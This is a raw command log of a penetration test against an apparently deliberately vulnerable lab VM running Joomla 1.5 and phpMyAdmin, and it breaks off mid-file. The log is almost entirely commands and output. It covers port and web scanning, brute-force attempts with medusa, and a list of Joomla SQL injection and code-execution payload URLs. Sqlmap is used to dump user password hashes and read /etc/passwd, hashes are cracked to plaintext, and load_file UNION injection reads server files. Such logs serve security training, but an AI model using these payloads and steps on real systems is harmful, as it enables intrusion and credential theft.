Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:4d:e2:d8 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.105 00:0c:29:74:b5:21 01 060 VMware, Inc.
root@kali:~# unicornscan 192.168.56.105
TCP open http[ 80] from 192.168.56.105 ttl 64
Main [Error chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.105 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 08:56 CET
Nmap scan report for 192.168.56.105
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
root@kali:~# nikto -host 192.168.56.105
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.105
+ Target Hostname: 192.168.56.105
+ Target Port: 80
+ Start Time: 2013-11-13 08:57:17 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 413560, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2013-11-13 08:57:33 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.105/
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Wed Nov 13 08:57:58 2013
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.56.105/check (CODE:200|SIZE:324)
+ http://192.168.56.105/index (CODE:200|SIZE:1324)
+ http://192.168.56.105/index.php (CODE:200|SIZE:1324)
==> DIRECTORY: http://192.168.56.105/javascript/
==> DIRECTORY: http://192.168.56.105/phpmyadmin/
+ http://192.168.56.105/server-status (CODE:403|SIZE:295)
---- Entering directory: http://192.168.56.105/javascript/ ----
==> DIRECTORY: http://192.168.56.105/javascript/jquery/
---- Entering directory: http://192.168.56.105/phpmyadmin/ ----
+ http://192.168.56.105/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.56.105/phpmyadmin/index.php (CODE:200|SIZE:8625)
==> DIRECTORY: http://192.168.56.105/phpmyadmin/js/
==> DIRECTORY: http://192.168.56.105/phpmyadmin/lang/
+ http://192.168.56.105/phpmyadmin/libraries (CODE:403|SIZE:302)
+ http://192.168.56.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://192.168.56.105/phpmyadmin/setup (CODE:401|SIZE:481)
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/
---- Entering directory: http://192.168.56.105/javascript/jquery/ ----
+ http://192.168.56.105/javascript/jquery/jquery (CODE:200|SIZE:120763)
---- Entering directory: http://192.168.56.105/phpmyadmin/js/ ----
---- Entering directory: http://192.168.56.105/phpmyadmin/lang/ ----
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.56.105/phpmyadmin/themes/original/img/
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.56.105/phpmyadmin/themes/original/img/ ----
-----------------
DOWNLOADED: 45920 - FOUND: 11
Iceweasel http://192.168.56.105/
http://192.168.56.105/phpmyadmin/
Mantra http://192.168.56.105/
Check
Enable post data
sqlmap -u "http://192.168.56.105/check.php" --data="username=admin&password=pass&Submit=Check%21" --level=5 --risk=5
[CRITICAL] all tested parameters appear to be not injectable.
http://192.168.56.105/phpmyadmin/Documentation.html?phpMyAdmin=1thocdud4fe6g9a8or6i6as7qaf5ee7a
phpMyAdmin 3.3.2 Documentation
root@kali:~# searchsploit phpmyadmin | grep "3.3"
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection /php/webapps/18371.rb
msfconsole
msf > search phpmyadmin
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal phpMyAdmin 3.5.2.2 server_sync.php Backdoor
exploit/multi/http/phpmyadmin_preg_replace 2013-04-25 excellent phpMyAdmin Authenticated Remote Code Execution via preg_replace()
exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent PhpMyAdmin Config File Code Injection
http://192.168.56.105/phpmyadmin/setup
A username and password are being requested by http://192.168.56.105. The site says: "phpMyAdmin Setup"
http user authentication.
medusa -h 192.168.56.105 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: kadence (16690 of 14344391 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.
medusa -h 192.168.56.105 -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: fletching (28231 of 88395 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.
medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/sqlmap/txt/wordlist.txt -v 6
...
medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -v 6
...
GENERAL: Medusa has finished.
NOTHING........
Going to back the 1st step....root@kali:~# nmap 192.168.56.105
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:01 CET
Nmap scan report for 192.168.56.105
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds
root@kali:~# nmap -sS 192.168.56.105 -pT1-65535
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
root@kali:~# nmap -sS 192.168.56.105 -p 1-65535
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.81 seconds
root@kali:~# nmap -sS 192.168.56.105 -p 1-65535
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:26 CET
Nmap scan report for 192.168.56.105
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
666/tcp open doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds
root@kali:~# nmap -sV 192.168.56.105 -pT:666
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:27 CET
Nmap scan report for 192.168.56.105
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
666/tcp open http Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds
http://192.168.56.105:666/
Powered by joomla 1.5 templates.
root@kali:~# joomscan -u http://192.168.56.105:666/
..|''|| '|| '||' '|' | .|'''.| '||''|.
.|' || '|. '|. .' ||| ||.. ' || ||
|| || || || | | || ''|||. ||...|'
'|. || ||| ||| .''''|. . '|| ||
''|...|' | | .|. .||. |'....|' .||.
=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================
Vulnerability Entries: 611
Last update: February 2, 2012
Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
Target: http://192.168.56.105:666
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
## Checking if the target has deployed an Anti-Scanner measure
[!] Scanning Passed ..... OK
## Detecting Joomla! based Firewall ...
[!] No known firewall detected!
## Fingerprinting in progress ...
~Generic version family ....... [1.5.x]
~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]
* Deduced version range is : [1.5.12 - 1.5.14]
## Fingerprinting done.
## 3 Components Found in front page ##
com_mailto com_user
com_abc
Vulnerabilities Discovered
==========================
# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes
# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A
# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No
# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No
# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No
# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No
# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No
# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No
# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No
# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No
# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No
# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No
# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No
# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes
# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No
# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No
# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No
# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes
# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No
# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No
# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No
# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No
# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No
# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No
# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No
# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No
# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No
# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No
# 30
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No
# 31
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No
# 32
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No
# 33
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes
# 34
Info -> Component: Amblog SQL Injection
Versions Affected: 1.0
Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version
Exploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Vulnerable? No
# 35
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No
# 36
Info -> Component: ABC Extension com_abc SQL
Versions Affected: 1.1.7 <=
Check: /index.php?option=com_abc&view=abc&letter=AS§ionid='
Exploit: /index.php?option=com_abc&view=abc&letter=AS§ionid='
Vulnerable? N/A
# 37
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No
# 38
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A
There are 4 vulnerable points in 38 found entries!
~[*] Time Taken: 44 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
root@kali:~#
http://192.168.56.105:666/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=
Restricted access
root@kali:~# nikto -host 192.168.56.105 -port 666
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.105
+ Target Hostname: 192.168.56.105
+ Target Port: 666
+ Start Time: 2013-11-13 16:58:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie 8eb16cd5703c7dc43799386d6dcb4057 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 147545, size: 304, mtime: 0x41a7982c29d80
+ File/dir '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ File/dir '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie dc5b33c885319f0ed52b91c702cf76e9 created without the httponly flag
+ File/dir '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:666/images/".
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 38 item(s) reported on remote host
+ End Time: 2013-11-13 16:58:56 (GMT1) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.56.105:666/
sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3"
--dbs
available databases [4]:
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
...
sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla -T jos_users -C id,username,password --dump
+----+---------------+-------------------------------------------------------------------+
| id | username | password |
+----+---------------+-------------------------------------------------------------------+
| 62 | Administrator | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl |
| 63 | JSmith | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF |
| 64 | BTallor | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy |
| 65 | test | be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX |
+----+---------------+-------------------------------------------------------------------+
sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --file-read "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
p0wnbox:x:1000:1000:p0wnbox,,,:/home/p0wnbox:/bin/bash
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false
download joomla_cracker.pl
a.pass:
Administrator:08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl
JSmith:992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF
BTallor:abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy
test:be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX
root@kali:~# perl joomla-cracker.pl a.pass /usr/share/metasploit-framework/data/john/wordlists/password.lst
Found hash/plain/user = 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF / matrix / JSmith
Found hash/plain/user = be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX / test / test
Found hash/plain/user = abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy / victim / BTallor
login JSMith / matrix
index.php?option=com_user&view=reset&layout=confirm
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/passwd%27%29
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/apache2.conf%27%29
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They're here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
